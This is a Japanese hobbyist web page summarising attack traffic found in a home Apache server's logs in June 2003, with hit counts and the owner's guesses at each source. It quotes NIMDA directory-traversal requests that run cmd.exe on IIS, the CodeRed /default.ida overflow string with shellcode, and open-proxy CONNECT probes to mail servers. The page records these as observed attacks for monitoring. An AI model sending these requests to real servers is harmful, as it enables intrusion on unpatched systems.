楽しみながら攻めつづける!
−HONDA '88NSR250R & '94NSR250R SE−

[検索方法]
 
山下の部屋 自宅サーバのログを見てみよう
お薦めコンテンツ 楽しみながら攻めつづける!
Apacheのログウォッチ 2003年6月1日〜2003年6月15日
 
 自宅Webサーバのログ集計です。何だか見慣れた感じがしてきた?WinサーバーのIISセキュリティを突いた不正アクセスが多いです。
 
 今回は新たに.swfへの不正?なアクセスがあり・・・新手かな??などとも思ったり・・・。
/NULL.printerへのアクセス(Samba狙いなのか?)も、WINNTAutoAttackと言うアタックツールからの攻撃のようだったりと新たなログも発見しました。しかし不正アクセスログ多いですね(汗)
 
400:Bad Request
Method URL Query 回数 理由
GET /scripts/..%%35%63../winnt/system32/cmd.exe /c+dir 11 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%%35c./winnt/system32/cmd.exe /c+dir 11 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
 
404:Not Found
Method URL Query 回数 理由
GET /default.ida XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XXXXXXXXXX
XX%u9090%u6
858%ucbd3%u
7801%u9090%
u6858%ucbd3
%u7801%u909
0%u6858%ucb
d3%u7801%u9
090%u990%u8
190%u00c3%u
0003%u8b00%
u531b%u53ff%
u0078%u0000
%u00=a		 281 「CodeRed」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir 11 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir 11 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /c/winnt/system32/cmd.exe /c+dir 11 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /d/winnt/system32/cmd.exe /c+dir 11 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe /c+dir 11 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /MSADC/root.exe /c+dir 11 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%25%35%63../winnt/system32/cmd.exe /c+dir 11 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 11 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%252f../winnt/system32/cmd.exe /c+dir 11 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c0%2f../winnt/system32/cmd.exe /c+dir 11 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 11 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 11 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir 11 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /scripts/root.exe /c+dir 11 「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET /_vti_bin/owssvr.dll UL=1&ACT=4
&BUILD=2614
&STRMVER=4
&CAPREQ=0		 2 IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET /MSOffice/cltreq.asp UL=1&ACT=4
&BUILD=2614
&STRMVER=4
&CAPREQ=0		 2 IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET /adv/intel/20030609/y3-0609intel_super_c.swf clickTAG=java
script:openWin
dow(1)		 1
GET /advertise/swf/kyotei_tpb0305_2.swf url=http%3A//
adserver.lycos.
co.jp/event.ng
/Type%3Dclick
%26FlightID%3D
9041%26AdID%
3D12165%26Ta
rgetID%3D1312
%26Segments%
3D2%2C14%2C
463%2C646%2
C685%2C687%
2C1040%2C13
20%2C1548%2
C1779%2C209
8%2C2115%2C
2254%2C2257
%2C2258%2C2
381%2C2451%
26Targets%3D
3775%2C3791
%2C3836%2C3
412%2C3494%
2C3510%2C35
15%2C3555%2
C3564%2C357
2%2C3578%2C
3584%2C3605
%2C1312%2C3
298%2C703%2
C793%2C3292
%2C3295%26V
alues%3D31%2
C43%2C51%2C
60%2C77%2C8
2%2C93%2C10
0%2C150%2C2
02%2C206%2C
269%2C346%2
C1471%2C151
8%2C1571%2C
1674%2C1928
%2C1950%2C3
378%2C3568%
26RawVa		 1
GET /NULL.printer - 1 WINNTAutoAttack V2.5というアタックツールからの攻撃?
GET http://211.48.93.13/test.asp - 1
 
405:Method Not Allowed
Method URL Query 回数 理由
CONNECT 64.156.215.5:25 - 1 25番ポートなので、他のmailサーバに接続しようとしてるのかな?
CONNECT 65.54.254.129:25 - 1 25番ポートなので、他のmailサーバに接続しようとしてるのかな?
CONNECT mx2.mail.yahoo.com:25 - 1 25番ポートなので、他のmailサーバに接続しようとしてるのかな?
POST http://171.75.198.7:25/ - 1 POST?
 
501:Not Implemented
Method URL Query 回数 理由
\x04\x01   - 2 AN HTTPDのセキュリティホールをつく攻撃みたい
\x05\x01   - 2 AN HTTPDのセキュリティホールをつく攻撃みたい
SEARCH / - 4
 
 
BACK TOP PAGE